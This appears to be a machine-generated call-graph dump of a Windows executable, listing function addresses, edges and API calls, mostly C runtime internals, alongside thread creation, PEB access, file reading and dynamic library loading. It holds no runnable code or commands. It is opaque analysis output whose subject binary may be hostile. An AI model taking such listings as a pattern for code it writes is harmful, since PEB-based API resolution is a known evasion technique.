6049f4 9127->9129 9132 604ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9129->9132 9131 604ad7 9131->9040 9132->9131 9134 60dca9 ___vcrt_InitializeCriticalSectionEx 5 API calls 9133->9134 9135 60dbb8 9134->9135 9136 60dbd0 TlsGetValue 9135->9136 9137 60885b 9135->9137 9136->9137 9137->9047 9137->9048 9137->9055 9139 60b0cb __freea 14 API calls 9138->9139 9140 6083c4 9139->9140 9140->9055 9174 60a8c8 9141->9174 9144 60ab70 GetOEMCP 9146 60ab99 9144->9146 9145 60ab82 9145->9146 9147 60ab87 GetACP 9145->9147 9146->8804 9148 60bc45 9146->9148 9147->9146 9149 60bc83 9148->9149 9153 60bc53 __dosmaperr 9148->9153 9151 60b757 __strnicoll 14 API calls 9149->9151 9150 60bc6e RtlAllocateHeap 9152 60ad17 9150->9152 9150->9153 9151->9152 9152->8800 9152->8801 9153->9149 9153->9150 9154 607207 __dosmaperr 2 API calls 9153->9154 9154->9153 9156 60ab4f 50 API calls 9155->9156 9157 60a96a 9156->9157 9158 60aa6f 9157->9158 9160 60a9a7 IsValidCodePage 9157->9160 9165 60a9c2 std::bad_exception::bad_exception 9157->9165 9159 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9158->9159 9161 60ab4d 9159->9161 9160->9158 9162 60a9b9 9160->9162 9161->8806 9161->8810 9163 60a9e2 GetCPInfo 9162->9163 9162->9165 9163->9158 9163->9165 9214 60aed9 9165->9214 9167 60b08a __FrameHandler3::FrameUnwindToState 9166->9167 9291 608161 EnterCriticalSection 9167->9291 9169 60b094 9292 60ae18 9169->9292 9175 60a8e6 9174->9175 9176 60a8df 9174->9176 9175->9176 9177 60a00a _unexpected 48 API calls 9175->9177 9176->9144 9176->9145 9178 60a907 9177->9178 9182 60d95d 9178->9182 9183 60d970 9182->9183 9184 60a91d 9182->9184 9183->9184 9190 60c179 9183->9190 9186 60d98a 9184->9186 9187 60d99d 9186->9187 9189 60d9b2 9186->9189 9187->9189 9211 60a863 9187->9211 9189->9176 9191 60c185 __FrameHandler3::FrameUnwindToState 9190->9191 9192 60a00a _unexpected 48 API calls 9191->9192 9193 60c18e 9192->9193 9194 60c1d4 9193->9194 9203 608161 EnterCriticalSection 9193->9203 9194->9184 9196 60c1ac 9204 60c1fa 9196->9204 9201 60835d __FrameHandler3::FrameUnwindToState 48 API calls 9202 60c1f9 9201->9202 9203->9196 9205 60c1bd 9204->9205 9206 60c208 __dosmaperr 9204->9206 9208 60c1d9 9205->9208 9206->9205 9207 60bfae __dosmaperr 14 API calls 9206->9207 9207->9205 9209 608178 __CreateFrameInfo LeaveCriticalSection 9208->9209 9210 60c1d0 9209->9210 9210->9194 9210->9201 9212 60a00a _unexpected 48 API calls 9211->9212 9213 60a868 9212->9213 9213->9189 9215 60af01 GetCPInfo 9214->9215 9224 60afca 9214->9224 9216 60af19 9215->9216 9215->9224 9225 60bced 9216->9225 9218 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9220 60b07c 9218->9220 9220->9158 9223 60ded4 52 API calls 9223->9224 9224->9218 9226 60a8c8 __strnicoll 48 API calls 9225->9226 9227 60bd0d 9226->9227 9245 60bdee 9227->9245 9229 60bdc9 9231 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9229->9231 9230 60bdc1 9248 60bccd 9230->9248 9234 60af81 9231->9234 9232 60bd3a 9232->9229 9232->9230 9233 60bc45 15 API calls 9232->9233 9236 60bd5f __alloca_probe_16 std::bad_exception::bad_exception 9232->9236 9233->9236 9240 60ded4 9234->9240 9236->9230 9237 60bdee ___scrt_uninitialize_crt MultiByteToWideChar 9236->9237 9238 60bda8 9237->9238 9238->9230 9239 60bdaf GetStringTypeW 9238->9239 9239->9230 9241 60a8c8 __strnicoll 48 API calls 9240->9241 9242 60dee7 9241->9242 9254 60df1d 9242->9254 9252 60be18 9245->9252 9249 60bcd9 9248->9249 9250 60bcea 9248->9250 9249->9250 9251 60b0cb __freea 14 API calls 9249->9251 9250->9229 9251->9250 9253 60be0a MultiByteToWideChar 9252->9253 9253->9232 9255 60df38 9254->9255 9256 60bdee ___scrt_uninitialize_crt MultiByteToWideChar 9255->9256 9260 60df7c 9256->9260 9257 60e0f7 9258 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9257->9258 9259 60afa2 9258->9259 9259->9223 9260->9257 9261 60bc45 15 API calls 9260->9261 9263 60dfa2 __alloca_probe_16 9260->9263 9274 60e04a 9260->9274 9261->9263 9262 60bccd __freea 14 API calls 9262->9257 9264 60bdee ___scrt_uninitialize_crt MultiByteToWideChar 9263->9264 9263->9274 9265 60dfeb 9264->9265 9265->9274 9282 609c5c 9265->9282 9268 60e021 9271 609c5c 6 API calls 9268->9271 9268->9274 9269 60e059 9270 60e0e2 9269->9270 9272 60bc45 15 API calls 9269->9272 9275 60e06b __alloca_probe_16 9269->9275 9273 60bccd __freea 14 API calls 9270->9273 9271->9274 9272->9275 9273->9274 9274->9262 9275->9270 9276 609c5c 6 API calls 9275->9276 9277 60e0ae 9276->9277 9277->9270 9288 60d131 9277->9288 9279 60e0c8 9279->9270 9280 60e0d1 9279->9280 9281 60bccd __freea 14 API calls 9280->9281 9281->9274 9283 609f57 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9282->9283 9284 609c67 9283->9284 9285 609c6d 9284->9285 9286 609cb9 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9284->9286 9285->9268 9285->9269 9285->9274 9287 609cad LCMapStringW 9286->9287 9287->9285 9289 60d144 ___scrt_uninitialize_crt 9288->9289 9290 60d182 WideCharToMultiByte 9289->9290 9290->9279 9291->9169 9302 60a7e2 9292->9302 9294 60ae3a 9295 60a7e2 48 API calls 9294->9295 9296 60ae59 9295->9296 9297 60ae80 9296->9297 9298 60b0cb __freea 14 API calls 9296->9298 9299 60b0bf 9297->9299 9298->9297 9316 608178 LeaveCriticalSection 9299->9316 9301 60b0ad 9301->8811 9303 60a7f3 9302->9303 9311 60a7ef CatchIt 9302->9311 9304 60a7fa 9303->9304 9308 60a80d std::bad_exception::bad_exception 9303->9308 9305 60b757 __strnicoll 14 API calls 9304->9305 9306 60a7ff 9305->9306 9307 607d69 __strnicoll 48 API calls 9306->9307 9307->9311 9309 60a844 9308->9309 9310 60a83b 9308->9310 9308->9311 9309->9311 9314 60b757 __strnicoll 14 API calls 9309->9314 9312 60b757 __strnicoll 14 API calls 9310->9312 9311->9294 9313 60a840 9312->9313 9315 607d69 __strnicoll 48 API calls 9313->9315 9314->9313 9315->9311 9316->9301 9318 6096ba 9317->9318 9319 6096c8 9317->9319 9318->9319 9324 6096e0 9318->9324 9320 60b757 __strnicoll 14 API calls 9319->9320 9321 6096d0 9320->9321 9322 607d69 __strnicoll 48 API calls 9321->9322 9323 6096da 9322->9323 9323->8757 9324->9323 9325 60b757 __strnicoll 14 API calls 9324->9325 9325->9321 9327 607b7a 9326->9327 9328 607b5d 9326->9328 9327->8763 9329 607b74 9328->9329 9331 60b0cb __freea 14 API calls 9328->9331 9330 60b0cb __freea 14 API calls 9329->9330 9330->9327 9331->9328 9333 607da2 9332->9333 9334 607dca __CreateFrameInfo 8 API calls 9333->9334 9335 607db7 GetCurrentProcess TerminateProcess 9334->9335 9335->8768 9337 60d30f 9336->9337 9338 60d320 9337->9338 9342 60d333 ___from_strstr_to_strchr 9337->9342 9339 60b757 __strnicoll 14 API calls 9338->9339 9340 60d325 9339->9340 9340->8711 9341 60d54a 9344 60b757 __strnicoll 14 API calls 9341->9344 9342->9341 9343 60d353 9342->9343 9399 60d56f 9343->9399 9346 60d54f 9344->9346 9348 60b0cb __freea 14 API calls 9346->9348 9348->9340 9349 60d399 9350 60d383 9349->9350 9354 60b807 __dosmaperr 14 API calls 9349->9354 9355 60b0cb __freea 14 API calls 9350->9355 9352 60d375 9359 60d392 9352->9359 9360 60d37e 9352->9360 9356 60d3a7 9354->9356 9355->9340 9358 60b0cb __freea 14 API calls 9356->9358 9357 60d40c 9362 60b0cb __freea 14 API calls 9357->9362 9367 60d3b2 9358->9367 9361 60d56f 48 API calls 9359->9361 9363 60b757 __strnicoll 14 API calls 9360->9363 9378 60d397 9361->9378 9366 60d414 9362->9366 9363->9350 9364 60d457 9364->9350 9365 60d0c4 51 API calls 9364->9365 9368 60d485 9365->9368 9374 60d441 9366->9374 9407 60d0c4 9366->9407 9367->9350 9369 60b807 __dosmaperr 14 API calls 9367->9369 9367->9378 9370 60b0cb __freea 14 API calls 9368->9370 9372 60d3ce 9369->9372 9370->9374 9371 60d53f 9373 60b0cb __freea 14 API calls 9371->9373 9376 60b0cb __freea 14 API calls 9372->9376 9373->9340 9374->9350 9374->9371 9380 60b807 __dosmaperr 14 API calls 9374->9380 9376->9378 9377 60d438 9379 60b0cb __freea 14 API calls 9377->9379 9378->9350 9403 60d589 9378->9403 9379->9374 9381 60d4d0 9380->9381 9382 60d4e0 9381->9382 9383 60d4d8 9381->9383 9385 6096ac ___std_exception_copy 48 API calls 9382->9385 9384 60b0cb __freea 14 API calls 9383->9384 9384->9350 9386 60d4ec 9385->9386 9387 60d4f3 9386->9387 9388 60d564 9386->9388 9416 60f9bc 9387->9416 9389 607d96 __strnicoll 11 API calls 9388->9389 9391 60d56e 9389->9391 9393 60d539 9395 60b0cb __freea 14 API calls 9393->9395 9394 60d51a 9396 60b757 __strnicoll 14 API calls 9394->9396 9395->9371 9397 60d51f 9396->9397 9398 60b0cb __freea 14 API calls 9397->9398 9398->9350 9400 60d35e 9399->9400 9401 60d57c 9399->9401 9400->9349 9400->9352 9400->9378 9431 60d5de 9401->9431 9404 60d3fc 9403->9404 9406 60d59f 9403->9406 9404->9357 9404->9364 9406->9404 9446 60f8cb 9406->9446 9408 60d0d1 9407->9408 9409 60d0ec 9407->9409 9408->9409 9410 60d0dd 9408->9410 9411 60d0fb 9409->9411 9480 60f6f8 9409->9480 9412 60b757 __strnicoll 14 API calls 9410->9412 9487 60f72b 9411->9487 9414 60d0e2 std::bad_exception::bad_exception 9412->9414 9414->9377 9499 60c274 9416->9499 9421 60fa2f 9422 60fa3b 9421->9422 9424 60b0cb __freea 14 API calls 9421->9424 9425 60d514 9422->9425 9428 60b0cb __freea 14 API calls 9422->9428 9423 60c274 48 API calls 9426 60fa0c 9423->9426 9424->9422 9425->9393 9425->9394 9427 60c30c 17 API calls 9426->9427 9429 60fa19 9427->9429 9428->9425 9429->9421 9430 60fa23 SetEnvironmentVariableW 9429->9430 9430->9421 9432 60d5f1 9431->9432 9433 60d5ec 9431->9433 9434 60b807 __dosmaperr 14 API calls 9432->9434 9433->9400 9435 60d60e 9434->9435 9436 60d67c 9435->9436 9439 60d681 9435->9439 9442 60b807 __dosmaperr 14 API calls 9435->9442 9443 60b0cb __freea 14 API calls 9435->9443 9444 6096ac ___std_exception_copy 48 API calls 9435->9444 9445 60d66b 9435->9445 9437 60835d __FrameHandler3::FrameUnwindToState 48 API calls 9436->9437 9437->9439 9438 60b0cb __freea 14 API calls 9438->9433 9440 607d96 __strnicoll 11 API calls 9439->9440 9441 60d68d 9440->9441 9442->9435 9443->9435 9444->9435 9445->9438 9447 60f8d9 9446->9447 9448 60f8df 9446->9448 9449 6101e1 9447->9449 9450 610199 9447->9450 9448->9406 9462 6101f7 9449->9462 9452 61019f 9450->9452 9453 6101bc 9450->9453 9454 60b757 __strnicoll 14 API calls 9452->9454 9457 60b757 __strnicoll 14 API calls 9453->9457 9461 6101da 9453->9461 9456 6101a4 9454->9456 9455 6101af 9455->9406 9458 607d69 __strnicoll 48 API calls 9456->9458 9459 6101cb 9457->9459 9458->9455 9460 607d69 __strnicoll 48 API calls 9459->9460 9460->9455 9461->9406 9463 610221 9462->9463 9464 610207 9462->9464 9465 610240 9463->9465 9466 610229 9463->9466 9467 60b757 __strnicoll 14 API calls 9464->9467 9469 610263 9465->9469 9470 61024c 9465->9470 9468 60b757 __strnicoll 14 API calls 9466->9468 9471 61020c 9467->9471 9472 61022e 9468->9472 9477 60a8c8 __strnicoll 48 API calls 9469->9477 9478 610217 9469->9478 9473 60b757 __strnicoll 14 API calls 9470->9473 9474 607d69 __strnicoll 48 API calls 9471->9474 9475 607d69 __strnicoll 48 API calls 9472->9475 9476 610251 9473->9476 9474->9478 9475->9478 9479 607d69 __strnicoll 48 API calls 9476->9479 9477->9478 9478->9455 9479->9478 9481 60f703 9480->9481 9482 60f718 HeapSize 9480->9482 9483 60b757 __strnicoll 14 API calls 9481->9483 9482->9411 9484 60f708 9483->9484 9485 607d69 __strnicoll 48 API calls 9484->9485 9486 60f713 9485->9486 9486->9411 9488 60f743 9487->9488 9489 60f738 9487->9489 9491 60f74b 9488->9491 9498 60f754 __dosmaperr 9488->9498 9490 60bc45 15 API calls 9489->9490 9496 60f740 9490->9496 9492 60b0cb __freea 14 API calls 9491->9492 9492->9496 9493 60f759 9495 60b757 __strnicoll 14 API calls 9493->9495 9494 60f77e HeapReAlloc 9494->9496 9494->9498 9495->9496 9496->9414 9497 607207 __dosmaperr 2 API calls 9497->9498 9498->9493 9498->9494 9498->9497 9500 60a8c8 __strnicoll 48 API calls 9499->9500 9501 60c286 9500->9501 9502 60c298 9501->9502 9507 609a96 9501->9507 9504 60c30c 9502->9504 9513 60c4e2 9504->9513 9510 609f23 9507->9510 9511 609e9e __dosmaperr 5 API calls 9510->9511 9512 609a9e 9511->9512 9512->9502 9514 60c4f0 9513->9514 9515 60c50a 9513->9515 9531 60c2f2 9514->9531 9517 60c530 9515->9517 9519 60c511 9515->9519 9518 60bdee ___scrt_uninitialize_crt MultiByteToWideChar 9517->9518 9520 60c53f 9518->9520 9523 60c324 9519->9523 9535 60c2b3 9519->9535 9522 60c546 GetLastError 9520->9522 9525 60c56c 9520->9525 9527 60c2b3 15 API calls 9520->9527 9540 60b77d 9522->9540 9523->9421 9523->9423 9525->9523 9528 60bdee ___scrt_uninitialize_crt MultiByteToWideChar 9525->9528 9527->9525 9530 60c583 9528->9530 9529 60b757 __strnicoll 14 API calls 9529->9523 9530->9522 9530->9523 9532 60c2fd 9531->9532 9534 60c305 9531->9534 9533 60b0cb __freea 14 API calls 9532->9533 9533->9534 9534->9523 9536 60c2f2 14 API calls 9535->9536 9537 60c2c1 9536->9537 9545 60c255 9537->9545 9548 60b76a 9540->9548 9542 60b788 __dosmaperr 9543 60b757 __strnicoll 14 API calls 9542->9543 9544 60b79b 9543->9544 9544->9529 9546 60bc45 15 API calls 9545->9546 9547 60c262 9546->9547 9547->9523 9549 60a15b __dosmaperr 14 API calls 9548->9549 9550 60b76f 9549->9550 9550->9542 9552 5fce50 std::_Throw_Cpp_error 9551->9552 9570 603b60 9552->9570 9555 5fce70 9563 5fce93 9555->9563 9556 5fd449 9557 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9556->9557 9558 5fcdd5 CreateEllipticRgn 9557->9558 9564 5fd4a0 9558->9564 9559 5fcf87 GetCurrentThreadId 9559->9563 9560 60441d std::_Throw_Cpp_error 52 API calls 9560->9559 9562 60441d 52 API calls std::_Throw_Cpp_error 9562->9563 9563->9556 9563->9559 9563->9560 9563->9562 9927 604952 WaitForSingleObjectEx 9563->9927 9565 5fd4c0 9564->9565 9567 5fd528 9565->9567 9932 60846b 9565->9932 9568 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9567->9568 9569 5fce14 9568->9569 9569->8571 9571 603b8b std::_Throw_Cpp_error 9570->9571 9584 603cc0 9571->9584 9573 603b9a 9593 606ce6 9573->9593 9575 603bea 9576 603c84 9575->9576 9578 603c9a 9575->9578 9608 603de0 9575->9608 9612 60441d 9576->9612 9618 603e30 9578->9618 9581 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9583 5fcdc7 9581->9583 9583->9555 9624 6041c6 9584->9624 9586 603cef std::_Throw_Cpp_error 9638 603f00 9586->9638 9591 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9592 603d32 9591->9592 9592->9573 9594 606cf3 9593->9594 9595 606d07 9593->9595 9597 60b757 __strnicoll 14 API calls 9594->9597 9662 606d77 9595->9662 9599 606cf8 9597->9599 9601 607d69 __strnicoll 48 API calls 9599->9601 9600 606d1c CreateThread 9602 606d47 9600->9602 9603 606d3b GetLastError 9600->9603 9679 606e00 9600->9679 9604 606d03 9601->9604 9671 606dc7 9602->9671 9605 60b77d __dosmaperr 14 API calls 9603->9605 9604->9575 9605->9602 9609 603e0c 9608->9609 9610 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9609->9610 9611 603e19 9610->9611 9611->9575 9613 604433 std::_Throw_Cpp_error 9612->9613 9819 60467d 9613->9819 9623 603e58 std::_Throw_Cpp_error 9618->9623 9619 603ee3 9620 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9619->9620 9621 603ca2 9620->9621 9621->9581 9623->9619 9923 6040f0 9623->9923 9627 6041cb 9624->9627 9626 6041e5 9626->9586 9627->9626 9628 607207 __dosmaperr 2 API calls 9627->9628 9630 6041e7 std::_Throw_Cpp_error 9627->9630 9647 6083c7 9627->9647 9628->9627 9629 6049c1 std::_Throw_Cpp_error 9631 6059fc std::_Xinvalid_argument RaiseException 9629->9631 9630->9629 9654 6059fc 9630->9654 9633 6049de IsProcessorFeaturePresent 9631->9633 9635 6049f4 9633->9635 9657 604ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9635->9657 9637 604ad7 9637->9586 9658 603fb0 9638->9658 9641 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9642 603d0e 9641->9642 9643 603f60 9642->9643 9644 603f95 9643->9644 9645 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9644->9645 9646 603d22 9645->9646 9646->9591 9653 60bc45 __dosmaperr 9647->9653 9648 60bc83 9650 60b757 __strnicoll 14 API calls 9648->9650 9649 60bc6e RtlAllocateHeap 9651 60bc81 9649->9651 9649->9653 9650->9651 9651->9627 9652 607207 __dosmaperr 2 API calls 9652->9653 9653->9648 9653->9649 9653->9652 9655 605a43 RaiseException 9654->9655 9656 605a16 9654->9656 9655->9629 9656->9655 9657->9637 9659 603fe2 std::_Throw_Cpp_error 9658->9659 9660 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9659->9660 9661 603f36 9660->9661 9661->9641 9663 60b807 __dosmaperr 14 API calls 9662->9663 9664 606d88 9663->9664 9665 60b0cb __freea 14 API calls 9664->9665 9666 606d95 9665->9666 9667 606db9 9666->9667 9668 606d9c GetModuleHandleExW 9666->9668 9669 606dc7 16 API calls 9667->9669 9668->9667 9670 606d13 9669->9670 9670->9600 9670->9602 9672 606dd3 9671->9672 9673 606d52 9671->9673 9674 606de2 9672->9674 9675 606dd9 CloseHandle 9672->9675 9673->9575 9676 606df1 9674->9676 9677 606de8 FreeLibrary 9674->9677 9675->9674 9678 60b0cb __freea 14 API calls 9676->9678 9677->9676 9678->9673 9680 606e0c __FrameHandler3::FrameUnwindToState 9679->9680 9681 606e20 9680->9681 9682 606e13 GetLastError ExitThread 9680->9682 9683 60a00a _unexpected 48 API calls 9681->9683 9684 606e25 9683->9684 9695 60b976 9684->9695 9687 606e3c 9699 603d40 9687->9699 9696 606e30 9695->9696 9697 60b986 __CreateFrameInfo 9695->9697 9696->9687 9710 609cea 9696->9710 9697->9696 9716 609d93 9697->9716 9700 603f60 5 API calls 9699->9700 9701 603d6d std::_Throw_Cpp_error 9700->9701 9719 6040a0 9701->9719 9706 603e30 5 API calls 9707 603da6 9706->9707 9708 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9707->9708 9709 603db5 9708->9709 9713 606d69 9709->9713 9711 609e9e __dosmaperr 5 API calls 9710->9711 9712 609d06 9711->9712 9712->9687 9807 606e7e 9713->9807 9717 609e9e __dosmaperr 5 API calls 9716->9717 9718 609daf 9717->9718 9718->9696 9727 5fcd10 GetPEB 9719->9727 9722 6048cb GetCurrentThreadId 9799 604c86 9722->9799 9726 6048e4 __Mtx_unlock __Cnd_broadcast 9802 604c92 9726->9802 9734 6084a7 9727->9734 9732 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9733 5fcd82 9732->9733 9733->9722 9735 6084ba __strnicoll 9734->9735 9749 608537 9735->9749 9738 607fd7 __strnicoll 48 API calls 9739 5fcd62 9738->9739 9740 5fc860 9739->9740 9746 5fc890 9740->9746 9742 5fcced 9743 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9742->9743 9745 5fccf9 9743->9745 9745->9732 9746->9742 9773 5fbeb0 CreateFileA 9746->9773 9783 5f86c0 9746->9783 9790 5f1000 9746->9790 9796 5f8ea0 9746->9796 9750 608567 9749->9750 9751 608594 9750->9751 9752 608576 9750->9752 9764 60856b 9750->9764 9753 6085a1 9751->9753 9755 6084de ___scrt_uninitialize_crt 48 API calls 9751->9755 9754 607f12 __strnicoll 29 API calls 9752->9754 9757 6085d9 9753->9757 9758 6085bb 9753->9758 9754->9764 9755->9753 9756 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9759 6084cc 9756->9759 9761 608769 9757->9761 9762 6085ed 9757->9762 9760 60da19 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9758->9760 9759->9738 9760->9764 9761->9764 9765 60d131 ___scrt_uninitialize_crt WideCharToMultiByte 9761->9765 9763 608687 9762->9763 9762->9764 9769 608631 9762->9769 9766 60d131 ___scrt_uninitialize_crt WideCharToMultiByte 9763->9766 9764->9756 9765->9764 9768 60869a 9766->9768 9767 60d131 ___scrt_uninitialize_crt WideCharToMultiByte 9767->9764 9768->9764 9770 6086b3 GetLastError 9768->9770 9769->9767 9770->9764 9771 6086c2 9770->9771 9771->9764 9772 60d131 ___scrt_uninitialize_crt WideCharToMultiByte 9771->9772 9772->9771 9778 5fbf29 9773->9778 9774 5fc021 GetFileSize 9774->9778 9775 5fc083 ReadFile 9775->9778 9776 5fc12c CloseHandle 9776->9778 9777 5fc059 CloseHandle 9777->9778 9778->9774 9778->9775 9778->9776 9778->9777 9779 5fc14b 9778->9779 9781 5fc10d CloseHandle 9778->9781 9780 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9779->9780 9782 5fc160 9780->9782 9781->9778 9782->9746 9786 5f8783 std::_Throw_Cpp_error 9783->9786 9784 5fe9b0 5 API calls std::_Throw_Cpp_error 9784->9786 9785 5f8dd8 9787 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9785->9787 9786->9784 9786->9785 9789 5fea10 51 API calls std::_Throw_Cpp_error 9786->9789 9788 5f8de8 9787->9788 9788->9746 9789->9786 9791 5f1041 9790->9791 9792 5f7eb0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9791->9792 9793 5f1451 9792->9793 9794 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9793->9794 9795 5f7e16 9794->9795 9795->9746 9797 5fd560 std::_Throw_Cpp_error 48 API calls 9796->9797 9798 5f8eb6 9797->9798 9798->9746 9805 6051de EnterCriticalSection 9799->9805 9801 604c90 9801->9726 9806 6051ec LeaveCriticalSection 9802->9806 9804 603d9e 9804->9706 9805->9801 9806->9804 9808 60a15b __dosmaperr 14 API calls 9807->9808 9810 606e89 9808->9810 9809 606ecb ExitThread 9810->9809 9812 606ea2 9810->9812 9816 609d25 9810->9816 9813 606eae CloseHandle 9812->9813 9814 606eb5 9812->9814 9813->9814 9814->9809 9815 606ec1 FreeLibraryAndExitThread 9814->9815 9815->9809 9817 609e9e __dosmaperr 5 API calls 9816->9817 9818 609d3e 9817->9818 9818->9812 9820 604689 __EH_prolog3_GS 9819->9820 9821 5f86c0 std::_Throw_Cpp_error 51 API calls 9820->9821 9822 60469d 9821->9822 9829 6045a6 9822->9829 9847 6042e6 9829->9847 9831 6045d7 9851 604533 9831->9851 9834 5fd560 std::_Throw_Cpp_error 48 API calls 9835 6045f9 9834->9835 9836 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9835->9836 9837 604618 9836->9837 9838 5fd560 9837->9838 9839 5fd584 std::_Throw_Cpp_error 9838->9839 9840 5fd6bf std::_Throw_Cpp_error 9839->9840 9920 5fd780 9839->9920 9841 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9840->9841 9842 5fd6f5 9841->9842 9844 604bd9 9842->9844 9845 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9844->9845 9846 604be3 9845->9846 9846->9846 9848 6042fe 9847->9848 9850 604305 CatchIt 9848->9850 9863 5ff980 9848->9863 9850->9831 9852 60453f __EH_prolog3_GS 9851->9852 9854 60455e std::_Throw_Cpp_error 9852->9854 9890 60434e 9852->9890 9855 60434e std::_Throw_Cpp_error 51 API calls 9854->9855 9856 604583 9855->9856 9857 5fd560 std::_Throw_Cpp_error 48 API calls 9856->9857 9858 60458b std::_Throw_Cpp_error 9857->9858 9859 5fd560 std::_Throw_Cpp_error 48 API calls 9858->9859 9860 60459e 9859->9860 9861 604bd9 std::_Throw_Cpp_error 5 API calls 9860->9861 9862 6045a5 std::domain_error::domain_error 9861->9862 9862->9834 9865 5ff9a4 9863->9865 9866 5ffeac 9865->9866 9870 5fff00 9865->9870 9878 600ff0 9865->9878 9867 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9866->9867 9868 5ffebc 9867->9868 9868->9850 9876 5fffa3 9870->9876 9871 600ff0 21 API calls std::_Throw_Cpp_error 9871->9876 9872 600642 9873 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9872->9873 9874 600fc0 9873->9874 9874->9865 9876->9871 9876->9872 9881 601010 9876->9881 9885 607d79 9876->9885 9879 6041c6 std::_Throw_Cpp_error 21 API calls 9878->9879 9880 601007 9879->9880 9880->9865 9882 60101e std::_Throw_Cpp_error 9881->9882 9883 6059fc std::_Xinvalid_argument RaiseException 9882->9883 9884 601036 9883->9884 9886 60809f __strnicoll 48 API calls 9885->9886 9887 607d88 9886->9887 9888 607d96 __strnicoll 11 API calls 9887->9888 9889 607d95 9888->9889 9891 60438f 9890->9891 9893 604365 CatchIt 9890->9893 9894 60476d 9891->9894 9893->9854 9895 604792 9894->9895 9896 604828 9894->9896 9905 5ff4d0 9895->9905 9917 5ff170 9896->9917 9901 5ff980 std::_Throw_Cpp_error 51 API calls 9902 6047ae CatchIt 9901->9902 9904 6047fa CatchIt 9902->9904 9911 5fd7f0 9902->9911 9904->9893 9907 5ff718 9905->9907 9906 5ff2e0 std::_Throw_Cpp_error 5 API calls 9906->9907 9907->9906 9908 5ff94d 9907->9908 9909 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9908->9909 9910 5ff960 9909->9910 9910->9901 9913 5fd8d2 9911->9913 9912 5fe5ad std::_Throw_Cpp_error 9914 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9912->9914 9913->9912 9916 5fe600 std::_Throw_Cpp_error 48 API calls 9913->9916 9915 5fe5d5 9914->9915 9915->9904 9916->9913 9918 604846 std::_Xinvalid_argument 50 API calls 9917->9918 9919 5ff182 9918->9919 9921 5fd7f0 std::_Throw_Cpp_error 48 API calls 9920->9921 9922 5fd7ab 9921->9922 9922->9839 9924 604114 9923->9924 9925 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 9924->9925 9926 604196 9925->9926 9926->9623 9928 604968 GetExitCodeThread 9927->9928 9929 60499a 9927->9929 9928->9929 9930 604979 CloseHandle 9928->9930 9929->9563 9930->9563 9933 608477 __FrameHandler3::FrameUnwindToState 9932->9933 9934 60a00a _unexpected 48 API calls 9933->9934 9937 60847c 9934->9937 9935 60835d __FrameHandler3::FrameUnwindToState 48 API calls 9936 6084a6 9935->9936 9937->9935 9939 60704d 9938->9939 9940 60705f 9938->9940 9941 6053ec __CreateFrameInfo GetModuleHandleW 9939->9941 9956 6071ba 9940->9956 9943 607052 9941->9943 9943->9940 9950 606f54 GetModuleHandleExW 9943->9950 9945 606f0c 9945->8545 9951 606f93 GetProcAddress 9950->9951 9952 606fb4 9950->9952 9951->9952 9953 606fa7 9951->9953 9954 606fc3 9952->9954 9955 606fba FreeLibrary 9952->9955 9953->9952 9954->9940 9955->9954 9957 6071c6 